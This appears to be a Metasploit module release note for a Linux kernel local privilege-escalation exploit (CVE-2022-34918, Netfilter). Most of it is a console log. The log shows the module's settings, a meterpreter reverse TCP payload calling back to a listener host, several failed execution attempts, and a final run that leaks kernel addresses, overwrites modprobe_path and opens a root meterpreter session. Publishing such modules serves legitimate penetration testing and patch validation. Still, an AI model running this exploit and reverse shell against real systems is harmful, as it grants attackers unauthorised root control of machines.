COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
MAX_TRIES 5 yes Number of times to execute the exploit
SESSION 12 yes The session to run this module on
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.135.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 12 closed. Reason: Died
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) >
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 13 opened (10.5.135.101:4567 -> 10.5.134.179:54832) at 2022-09-27 16:18:14 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 13
session => 13
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/tV6ZpfjxdR' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/b4WILWg9w' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/tV6ZpfjxdR: Operation timed out.
[-] Failed to delete /tmp/b4WILWg9w: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 13 closed. Reason: Died
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 14 opened (10.5.135.101:4567 -> 10.5.134.179:50242) at 2022-09-27 16:20:06 -0500
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 14
session => 14
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/fdeA1Aj' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/YZ3vR' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/fdeA1Aj: Operation timed out.
15th time is a charm!
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 15
session => 15
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Lrarc2Y' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/dldRHofZp' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created
[*] Meterpreter session 16 opened (10.5.135.101:4444 -> 10.5.134.179:57886) at 2022-09-27 16:27:47 -0500
[-] Failed to delete /tmp/Lrarc2Y: Operation timed out.
[-] Failed to delete /tmp/dldRHofZp: Operation timed out.
meterpreter >
meterpreter > sysinfo
Computer : 10.5.134.179
OS : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
Release Notes
This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.